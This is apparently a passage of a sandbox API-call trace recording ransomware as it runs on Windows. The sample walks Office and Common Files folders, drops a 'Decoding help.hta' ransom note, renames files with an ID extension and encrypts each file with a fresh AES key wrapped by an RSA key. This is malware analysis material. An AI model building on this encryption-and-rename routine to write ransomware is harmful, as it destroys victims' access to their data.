lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5c70 [0041.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.458] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.458] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.459] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0041.459] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" [0041.459] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.459] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.459] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.459] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0041.640] WriteFile (in: hFile=0x2f8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.641] CloseHandle (hObject=0x2f8) returned 1 [0041.641] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.642] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ExcelLR.cab") returned -1 [0041.642] lstrlenW (lpString="ExcelLR.cab") returned 11 [0041.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" [0041.642] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.642] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="ExcelLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0041.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" [0041.642] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0041.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.898] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0041.898] CreateFileMappingA (hFile=0x1d4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x378 [0041.898] CryptAcquireContextA (in: phProv=0x2c0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2c0fcec*=0x3449e80) returned 1 [0045.048] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x2c0fce8 | out: phKey=0x2c0fce8*=0x5d7dd0) returned 1 [0045.048] CryptExportKey (in: hKey=0x5d7dd0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2c0fbe4, pdwDataLen=0x2c0fce4 | out: pbData=0x2c0fbe4*, pdwDataLen=0x2c0fce4*=0x2c) returned 1 [0045.048] MapViewOfFile (hFileMappingObject=0x378, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x18560000 [0045.064] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c0fbe4*, pdwDataLen=0x2c0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2c0fbe4*, pdwDataLen=0x2c0fcf8*=0x100) returned 1 [0045.064] CryptEncrypt (in: hKey=0x5d7dd0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x18560000, pdwDataLen=0x2c0fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x18560000*, pdwDataLen=0x2c0fce4*=0x100000) returned 1 [0045.767] UnmapViewOfFile (lpBaseAddress=0x18560000) returned 1 [0045.961] CloseHandle (hObject=0x378) returned 1 [0045.961] CryptDestroyKey (hKey=0x5d7dd0) returned 1 [0045.961] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0045.961] SetFilePointerEx (in: hFile=0x1d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.961] WriteFile (in: hFile=0x1d4, lpBuffer=0x2c0fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2c0fbe4*, lpNumberOfBytesWritten=0x2c0fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.045] WriteFile (in: hFile=0x1d4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2c0fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.046] CloseHandle (hObject=0x1d4) returned 1 [0054.110] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.207] FindNextFileW (in: hFindFile=0x5a5c70, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0058.207] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" [0058.207] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.207] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ExcelMUI.msi") returned -1 [0058.207] lstrlenW (lpString="ExcelMUI.msi") returned 12 [0058.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*" [0058.207] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.207] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\", lpString2="ExcelMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" [0058.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" [0058.207] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.208] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0058.208] CreateFileMappingA (hFile=0x370, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6f8 [0058.208] CryptAcquireContextA (in: phProv=0x2c0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2c0fcec*=0x3448500) returned 1 [0060.183] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0x2c0fce8 | out: phKey=0x2c0fce8*=0x42cf318) returned 1 [0060.183] CryptExportKey (in: hKey=0x42cf318, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2c0fbe4, pdwDataLen=0x2c0fce4 | out: pbData=0x2c0fbe4*, pdwDataLen=0x2c0fce4*=0x2c) returned 1 [0060.183] MapViewOfFile (hFileMappingObject=0x6f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xbcd0000 [0063.822] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c0fbe4*, pdwDataLen=0x2c0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2c0fbe4*, pdwDataLen=0x2c0fcf8*=0x100) returned 1 [0063.822] CryptEncrypt (hKey=0x42cf318, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xbcd0000, pdwDataLen=0x2c0fce4*=0x100000, dwBufLen=0x100000) Thread: id = 111 os_tid = 0xbf4 [0040.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a57f0 [0040.109] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.109] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.109] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.109] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.109] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW", cAlternateFileName="")) returned 1 [0040.109] lstrcmpW (lpString1=".", lpString2="DW") returned -1 [0040.109] lstrcmpW (lpString1="..", lpString2="DW") returned -1 [0040.109] lstrcmpiW (lpString1="windows", lpString2="DW") returned 1 [0040.109] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.109] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.109] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="DW" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW" [0040.109] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*" [0040.109] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d80798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.110] CloseHandle (hObject=0x1e8) returned 1 [0040.110] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQUATION", cAlternateFileName="")) returned 1 [0040.110] lstrcmpW (lpString1=".", lpString2="EQUATION") returned -1 [0040.110] lstrcmpW (lpString1="..", lpString2="EQUATION") returned -1 [0040.110] lstrcmpiW (lpString1="windows", lpString2="EQUATION") returned 1 [0040.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.110] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.110] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="EQUATION" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION" [0040.110] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*" [0040.111] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.111] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93b8320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.111] CloseHandle (hObject=0x1e8) returned 1 [0040.111] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x58c7d970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x58c7d970, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EURO", cAlternateFileName="")) returned 1 [0040.111] lstrcmpW (lpString1=".", lpString2="EURO") returned -1 [0040.111] lstrcmpW (lpString1="..", lpString2="EURO") returned -1 [0040.111] lstrcmpiW (lpString1="windows", lpString2="EURO") returned 1 [0040.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.114] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="EURO" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO" [0040.114] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*" [0040.114] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a9dfd8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.115] CloseHandle (hObject=0x1e8) returned 1 [0040.115] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters", cAlternateFileName="")) returned 1 [0040.115] lstrcmpW (lpString1=".", lpString2="Filters") returned -1 [0040.115] lstrcmpW (lpString1="..", lpString2="Filters") returned -1 [0040.115] lstrcmpiW (lpString1="windows", lpString2="Filters") returned 1 [0040.117] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.117] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.117] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="Filters" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters" [0040.117] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*" [0040.117] GlobalMemoryStatus (in: lpBuffer=0x334fd10 | out: lpBuffer=0x334fd10) [0040.117] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ab6040, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0040.118] CloseHandle (hObject=0x1e8) returned 1 [0040.118] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0040.118] lstrcmpW (lpString1=".", lpString2="GRPHFLT") returned -1 [0040.118] lstrcmpW (lpString1="..", lpString2="GRPHFLT") returned -1 [0040.118] lstrcmpiW (lpString1="windows", lpString2="GRPHFLT") returned 1 [0040.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*" [0040.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\*.*") returned 54 [0040.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\", lpString2="GRPHFLT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT" [0040.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 